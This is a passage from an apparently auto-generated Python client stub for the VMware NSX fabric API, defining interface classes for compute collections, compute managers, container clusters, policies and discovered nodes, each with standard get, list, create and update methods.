        :rtype: :class:`com.vmware.nsx.model_client.ComputeCollectionFabricTemplate`
        :return: com.vmware.nsx.model.ComputeCollectionFabricTemplate
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('get',
                            {
                            'fabric_template_id': fabric_template_id,
                            })

    def list(self,
             compute_collection_id=None,
             ):
        """
        Returns compute collection fabric templates

        :type compute_collection_id: :class:`str` or ``None``
        :param compute_collection_id: Compute collection id (optional)
        :rtype: :class:`com.vmware.nsx.model_client.ComputeCollectionFabricTemplateListResult`
        :return: com.vmware.nsx.model.ComputeCollectionFabricTemplateListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('list',
                            {
                            'compute_collection_id': compute_collection_id,
                            })

    def update(self,
               fabric_template_id,
               compute_collection_fabric_template,
               ):
        """
        Updates compute collection fabric template for the given id

        :type fabric_template_id: :class:`str`
        :param fabric_template_id: (required)
        :type compute_collection_fabric_template: :class:`com.vmware.nsx.model_client.ComputeCollectionFabricTemplate`
        :param compute_collection_fabric_template: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ComputeCollectionFabricTemplate`
        :return: com.vmware.nsx.model.ComputeCollectionFabricTemplate
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('update',
                            {
                            'fabric_template_id': fabric_template_id,
                            'compute_collection_fabric_template': compute_collection_fabric_template,
                            })
class ComputeCollections(VapiInterface):
    """
    vAPI stub for the com.vmware.nsx.fabric.compute_collections service
    (see ``_VAPI_SERVICE_ID`` below).
    """
    # NOTE(review): this file is auto-generated (see the header above:
    # "AUTO GENERATED FILE -- DO NOT MODIFY!"). Fix defects by regenerating
    # from the service definition, not by hand-editing here.
    CREATE_ACTION_NSX = "remove_nsx"
    """
    Possible value for ``action`` of method :func:`ComputeCollections.create`.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.compute_collections'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _ComputeCollectionsStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self,
               cc_ext_id,
               action=None,
               ):
        """
        Perform action specific to NSX on the compute-collection. cc-ext-id
        should be of type VC_Cluster.

        :type cc_ext_id: :class:`str`
        :param cc_ext_id: (required)
        :type action: :class:`str` or ``None``
        :param action: Supported actions on compute-collection (optional)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('create',
                            {
                            'cc_ext_id': cc_ext_id,
                            'action': action,
                            })

    def get(self,
            cc_ext_id,
            ):
        """
        Returns information about a specific compute collection.

        :type cc_ext_id: :class:`str`
        :param cc_ext_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ComputeCollection`
        :return: com.vmware.nsx.model.ComputeCollection
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('get',
                            {
                            'cc_ext_id': cc_ext_id,
                            })

    def list(self,
             cm_local_id=None,
             cursor=None,
             discovered_node_id=None,
             display_name=None,
             external_id=None,
             included_fields=None,
             node_id=None,
             origin_id=None,
             origin_type=None,
             owner_id=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        Returns information about all compute collections.

        :type cm_local_id: :class:`str` or ``None``
        :param cm_local_id: Local Id of the compute collection in the Compute Manager
            (optional)
        :type cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied
            by current result page) (optional)
        :type discovered_node_id: :class:`str` or ``None``
        :param discovered_node_id: Id of the discovered node which belongs to this Compute Collection
            (optional)
        :type display_name: :class:`str` or ``None``
        :param display_name: Name of the ComputeCollection in source compute manager (optional)
        :type external_id: :class:`str` or ``None``
        :param external_id: External ID of the ComputeCollection in the source Compute manager,
            e.g. mo-ref in VC (optional)
        :type included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query
            result (optional)
        :type node_id: :class:`str` or ``None``
        :param node_id: Id of the fabric node created from a discovered node belonging to
            this Compute Collection (optional)
        :type origin_id: :class:`str` or ``None``
        :param origin_id: Id of the compute manager from where this Compute Collection was
            discovered (optional)
        :type origin_type: :class:`str` or ``None``
        :param origin_type: ComputeCollection type like VC_Cluster. Here the Compute Manager
            type prefix would help in differentiating similar named Compute
            Collection types from different Compute Managers (optional)
        :type owner_id: :class:`str` or ``None``
        :param owner_id: Id of the owner of compute collection in the Compute Manager
            (optional)
        :type page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return
            fewer) (optional, default to 1000)
        :type sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.ComputeCollectionListResult`
        :return: com.vmware.nsx.model.ComputeCollectionListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('list',
                            {
                            'cm_local_id': cm_local_id,
                            'cursor': cursor,
                            'discovered_node_id': discovered_node_id,
                            'display_name': display_name,
                            'external_id': external_id,
                            'included_fields': included_fields,
                            'node_id': node_id,
                            'origin_id': origin_id,
                            'origin_type': origin_type,
                            'owner_id': owner_id,
                            'page_size': page_size,
                            'sort_ascending': sort_ascending,
                            'sort_by': sort_by,
                            })
class ComputeManagers(VapiInterface):
    """Client stub for the NSX fabric compute-managers service."""

    # Canonical identifier of the service.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.compute_managers'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _ComputeManagersStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, compute_manager):
        """
        Register a compute manager with NSX. The inventory service will
        collect data from the registered compute manager.

        :type  compute_manager: :class:`com.vmware.nsx.model_client.ComputeManager`
        :param compute_manager: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ComputeManager`
        :return: The registered compute manager.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        return self._invoke('create', {'compute_manager': compute_manager})

    def delete(self, compute_manager_id):
        """
        Unregister the specified compute manager.

        :type  compute_manager_id: :class:`str`
        :param compute_manager_id: (required)
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        return self._invoke('delete', {'compute_manager_id': compute_manager_id})

    def get(self, compute_manager_id):
        """
        Return information about a specific compute manager.

        :type  compute_manager_id: :class:`str`
        :param compute_manager_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ComputeManager`
        :return: The requested compute manager.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        return self._invoke('get', {'compute_manager_id': compute_manager_id})

    def list(self, cursor=None, included_fields=None, origin_type=None,
             page_size=None, server=None, sort_ascending=None, sort_by=None):
        """
        Return information about all compute managers.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor for fetching the next page of records,
            as supplied by the current result page. (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma-separated list of fields to include in
            the query result. (optional)
        :type  origin_type: :class:`str` or ``None``
        :param origin_type: Compute manager type, e.g. vCenter. (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results per page; the server may
            return fewer. (optional, default to 1000)
        :type  server: :class:`str` or ``None``
        :param server: IP address or hostname of the compute manager. (optional)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted. (optional)
        :rtype: :class:`com.vmware.nsx.model_client.ComputeManagerListResult`
        :return: Paged list of compute managers.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        args = {
            'cursor': cursor,
            'included_fields': included_fields,
            'origin_type': origin_type,
            'page_size': page_size,
            'server': server,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', args)

    def update(self, compute_manager_id, compute_manager):
        """
        Update the specified compute manager.

        :type  compute_manager_id: :class:`str`
        :param compute_manager_id: (required)
        :type  compute_manager: :class:`com.vmware.nsx.model_client.ComputeManager`
        :param compute_manager: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ComputeManager`
        :return: The updated compute manager.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        args = {
            'compute_manager_id': compute_manager_id,
            'compute_manager': compute_manager,
        }
        return self._invoke('update', args)
class ContainerApplicationInstances(VapiInterface):
    """Client stub for the NSX fabric container-application-instances service."""

    # Canonical identifier of the service.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.container_application_instances'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _ContainerApplicationInstancesStub)
        self._VAPI_OPERATION_IDS = {}

    def get(self, container_application_instance_id):
        """
        Return information about a specific container application instance.

        :type  container_application_instance_id: :class:`str`
        :param container_application_instance_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ContainerApplicationInstance`
        :return: The requested container application instance.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        return self._invoke('get',
                            {'container_application_instance_id': container_application_instance_id})

    def list(self, container_application_id=None, container_cluster_id=None,
             container_project_id=None, cursor=None, included_fields=None,
             page_size=None, sort_ascending=None, sort_by=None):
        """
        Return information about all container application instances.

        :type  container_application_id: :class:`str` or ``None``
        :param container_application_id: Identifier of the container
            application. (optional)
        :type  container_cluster_id: :class:`str` or ``None``
        :param container_cluster_id: Identifier of the container cluster. (optional)
        :type  container_project_id: :class:`str` or ``None``
        :param container_project_id: Identifier of the container project. (optional)
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor for fetching the next page of records,
            as supplied by the current result page. (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma-separated list of fields to include in
            the query result. (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results per page; the server may
            return fewer. (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted. (optional)
        :rtype: :class:`com.vmware.nsx.model_client.ContainerApplicationInstanceListResult`
        :return: Paged list of container application instances.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        args = {
            'container_application_id': container_application_id,
            'container_cluster_id': container_cluster_id,
            'container_project_id': container_project_id,
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', args)
class ContainerApplications(VapiInterface):
    """Client stub for the NSX fabric container-applications service."""

    # Canonical identifier of the service.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.container_applications'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _ContainerApplicationsStub)
        self._VAPI_OPERATION_IDS = {}

    def get(self, container_application_id):
        """
        Return information about a specific container application within a
        project.

        :type  container_application_id: :class:`str`
        :param container_application_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ContainerApplication`
        :return: The requested container application.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        return self._invoke('get',
                            {'container_application_id': container_application_id})

    def list(self, container_cluster_id=None, container_project_id=None,
             cursor=None, included_fields=None, page_size=None,
             sort_ascending=None, sort_by=None):
        """
        Return information about all container applications.

        :type  container_cluster_id: :class:`str` or ``None``
        :param container_cluster_id: Identifier of the container cluster. (optional)
        :type  container_project_id: :class:`str` or ``None``
        :param container_project_id: Identifier of the container project. (optional)
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor for fetching the next page of records,
            as supplied by the current result page. (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma-separated list of fields to include in
            the query result. (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results per page; the server may
            return fewer. (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted. (optional)
        :rtype: :class:`com.vmware.nsx.model_client.ContainerApplicationListResult`
        :return: Paged list of container applications.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        args = {
            'container_cluster_id': container_cluster_id,
            'container_project_id': container_project_id,
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', args)
class ContainerClusterNodes(VapiInterface):
    """Client stub for the NSX fabric container-cluster-nodes service."""

    # Canonical identifier of the service.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.container_cluster_nodes'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _ContainerClusterNodesStub)
        self._VAPI_OPERATION_IDS = {}

    def get(self, container_cluster_node_id):
        """
        Return information about a specific container cluster node.

        :type  container_cluster_node_id: :class:`str`
        :param container_cluster_node_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ContainerClusterNode`
        :return: The requested container cluster node.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        return self._invoke('get',
                            {'container_cluster_node_id': container_cluster_node_id})

    def list(self, container_cluster_id=None, cursor=None,
             included_fields=None, page_size=None, sort_ascending=None,
             sort_by=None):
        """
        Return information about all container cluster nodes.

        :type  container_cluster_id: :class:`str` or ``None``
        :param container_cluster_id: Identifier of the container cluster. (optional)
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor for fetching the next page of records,
            as supplied by the current result page. (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma-separated list of fields to include in
            the query result. (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results per page; the server may
            return fewer. (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted. (optional)
        :rtype: :class:`com.vmware.nsx.model_client.ContainerClusterNodeListResult`
        :return: Paged list of container cluster nodes.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        args = {
            'container_cluster_id': container_cluster_id,
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', args)
class ContainerClusters(VapiInterface):
    """Client stub for the NSX fabric container-clusters service."""

    # Possible values for ``clusterType`` of :func:`ContainerClusters.list`.
    LIST_CLUSTER_TYPE_PAS = "PAS"
    LIST_CLUSTER_TYPE_PKS = "PKS"
    LIST_CLUSTER_TYPE_KUBERNETES = "Kubernetes"
    LIST_CLUSTER_TYPE_OPENSHIFT = "Openshift"
    LIST_CLUSTER_TYPE_WCP = "WCP"
    LIST_CLUSTER_TYPE_OTHER = "Other"
    # Possible values for ``infraType`` of :func:`ContainerClusters.list`.
    LIST_INFRA_TYPE_VSPHERE = "vSphere"
    LIST_INFRA_TYPE_AWS = "AWS"
    LIST_INFRA_TYPE_AZURE = "Azure"
    LIST_INFRA_TYPE_VMC = "VMC"
    LIST_INFRA_TYPE_KVM = "KVM"
    LIST_INFRA_TYPE_BAREMETAL = "Baremetal"
    # Canonical identifier of the service.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.container_clusters'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _ContainerClustersStub)
        self._VAPI_OPERATION_IDS = {}

    def get(self, container_cluster_id):
        """
        Return information about a specific container cluster.

        :type  container_cluster_id: :class:`str`
        :param container_cluster_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ContainerCluster`
        :return: The requested container cluster.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        return self._invoke('get',
                            {'container_cluster_id': container_cluster_id})

    def list(self, cluster_type=None, cursor=None, included_fields=None,
             infra_type=None, page_size=None, sort_ascending=None,
             sort_by=None):
        """
        Return information about all container clusters.

        :type  cluster_type: :class:`str` or ``None``
        :param cluster_type: Type of container cluster; see the
            ``LIST_CLUSTER_TYPE_*`` class attributes. (optional)
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor for fetching the next page of records,
            as supplied by the current result page. (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma-separated list of fields to include in
            the query result. (optional)
        :type  infra_type: :class:`str` or ``None``
        :param infra_type: Type of infrastructure; see the
            ``LIST_INFRA_TYPE_*`` class attributes. (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results per page; the server may
            return fewer. (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted. (optional)
        :rtype: :class:`com.vmware.nsx.model_client.ContainerClusterListResult`
        :return: Paged list of container clusters.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        args = {
            'cluster_type': cluster_type,
            'cursor': cursor,
            'included_fields': included_fields,
            'infra_type': infra_type,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', args)
class ContainerIngressPolicies(VapiInterface):
    """Client stub for the NSX fabric container-ingress-policies service."""

    # Canonical identifier of the service.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.container_ingress_policies'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _ContainerIngressPoliciesStub)
        self._VAPI_OPERATION_IDS = {}

    def get(self, ingress_policy_id):
        """
        Return information about a specific ingress policy.

        :type  ingress_policy_id: :class:`str`
        :param ingress_policy_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ContainerIngressPolicy`
        :return: The requested ingress policy.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        return self._invoke('get', {'ingress_policy_id': ingress_policy_id})

    def list(self, container_cluster_id=None, container_project_id=None,
             cursor=None, included_fields=None, page_size=None,
             sort_ascending=None, sort_by=None):
        """
        Return information about all ingress policies.

        :type  container_cluster_id: :class:`str` or ``None``
        :param container_cluster_id: Identifier of the container cluster. (optional)
        :type  container_project_id: :class:`str` or ``None``
        :param container_project_id: Identifier of the container project. (optional)
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor for fetching the next page of records,
            as supplied by the current result page. (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma-separated list of fields to include in
            the query result. (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results per page; the server may
            return fewer. (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted. (optional)
        :rtype: :class:`com.vmware.nsx.model_client.ContainerIngressPolicyListResult`
        :return: Paged list of ingress policies.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        args = {
            'container_cluster_id': container_cluster_id,
            'container_project_id': container_project_id,
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', args)
class ContainerNetworkPolicies(VapiInterface):
    """Client stub for the NSX fabric container-network-policies service."""

    # Canonical identifier of the service.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.container_network_policies'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _ContainerNetworkPoliciesStub)
        self._VAPI_OPERATION_IDS = {}

    def get(self, network_policy_id):
        """
        Return information about a specific network policy.

        :type  network_policy_id: :class:`str`
        :param network_policy_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ContainerNetworkPolicy`
        :return: The requested network policy.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        return self._invoke('get', {'network_policy_id': network_policy_id})

    def list(self, container_cluster_id=None, container_project_id=None,
             cursor=None, included_fields=None, page_size=None,
             sort_ascending=None, sort_by=None):
        """
        Return information about all network policies.

        :type  container_cluster_id: :class:`str` or ``None``
        :param container_cluster_id: Identifier of the container cluster. (optional)
        :type  container_project_id: :class:`str` or ``None``
        :param container_project_id: Identifier of the container project. (optional)
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor for fetching the next page of records,
            as supplied by the current result page. (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma-separated list of fields to include in
            the query result. (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results per page; the server may
            return fewer. (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted. (optional)
        :rtype: :class:`com.vmware.nsx.model_client.ContainerNetworkPolicyListResult`
        :return: Paged list of network policies.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        args = {
            'container_cluster_id': container_cluster_id,
            'container_project_id': container_project_id,
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', args)
class ContainerProjects(VapiInterface):
    """Client stub for the NSX fabric container-projects service."""

    # Canonical identifier of the service.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.container_projects'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _ContainerProjectsStub)
        self._VAPI_OPERATION_IDS = {}

    def get(self, container_project_id):
        """
        Return information about a specific project.

        :type  container_project_id: :class:`str`
        :param container_project_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ContainerProject`
        :return: The requested container project.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        return self._invoke('get',
                            {'container_project_id': container_project_id})

    def list(self, container_cluster_id=None, cursor=None,
             included_fields=None, page_size=None, sort_ascending=None,
             sort_by=None):
        """
        Return information about all container projects.

        :type  container_cluster_id: :class:`str` or ``None``
        :param container_cluster_id: Identifier of the container cluster. (optional)
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor for fetching the next page of records,
            as supplied by the current result page. (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma-separated list of fields to include in
            the query result. (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results per page; the server may
            return fewer. (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted. (optional)
        :rtype: :class:`com.vmware.nsx.model_client.ContainerProjectListResult`
        :return: Paged list of container projects.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        args = {
            'container_cluster_id': container_cluster_id,
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', args)
class DiscoveredNodes(VapiInterface):
    """Client stub for the NSX fabric discovered-nodes service."""

    # Possible values for ``hasParent`` of :func:`DiscoveredNodes.list`.
    LIST_HAS_PARENT_TRUE = "true"
    LIST_HAS_PARENT_FALSE = "false"
    # Canonical identifier of the service.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.discovered_nodes'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _DiscoveredNodesStub)
        self._VAPI_OPERATION_IDS = {}

    def createtransportnode(self, node_ext_id, transport_node):
        """
        Install NSX components on the host and create a transport node with
        the given configuration.

        :type  node_ext_id: :class:`str`
        :param node_ext_id: (required)
        :type  transport_node: :class:`com.vmware.nsx.model_client.TransportNode`
        :param transport_node: (required)
        :rtype: :class:`com.vmware.nsx.model_client.TransportNode`
        :return: The created transport node.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
            :mod:`com.vmware.vapi.std.errors_client`.
        """
        args = {
            'node_ext_id': node_ext_id,
            'transport_node': transport_node,
        }
        return self._invoke('createtransportnode', args)

    def get(self, node_ext_id):
        """
        Return information about a specific discovered node.

        :type  node_ext_id: :class:`str`
        :param node_ext_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.DiscoveredNode`
        :return: The requested discovered node.
        :raise: May raise ``ServiceUnavailable``, ``InvalidRequest``,
            ``InternalServerError``, ``Unauthorized`` or ``NotFound`` from
